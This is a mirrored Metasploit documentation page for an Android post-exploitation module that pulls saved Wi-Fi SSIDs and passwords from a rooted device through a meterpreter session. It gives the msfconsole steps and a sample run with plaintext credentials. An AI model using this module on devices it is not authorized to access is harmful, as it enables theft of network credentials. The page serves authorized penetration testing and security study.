Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/android/gather/wireless_ap.md
32373 views

Vulnerable Application

This post-exploitation module will extract all saved Wireless access point credentials from the target android device.

Verification Steps

  1. Start msfconsole

  2. Get a root meterpreter session (use exploit/android/local/...)

  3. use post/android/gather/wireless_ap

  4. set SESSION <session id>

  5. run

  6. You should be able to see the extracted credentials.

Options

SESSION

The session to run the module on.

Extracted data

Wireless AP credentials (SSID, network type and password)

Scenarios

msf exploit(multi/handler) > use post/android/gather/wireless_ap msf post(android/gather/wireless_ap) > set session 1 session => 1 msf post(android/gather/wireless_ap) > run Wireless APs ============ SSID net_type password ---- -------- -------- ADYYYXRoYXJ2YWpvc2hp WPA-PSK   lkjhgfdsa FCP_WiFi              NONE HomeCable             WPA-PSK   p@$$w0rd Troika               WPA-PSK   ika@12345 [+] Secrets stored in: ~/.msf4/loot/...wireless.ap.cred_...txt [*] Post module execution completed msf post(android/gather/wireless_ap) >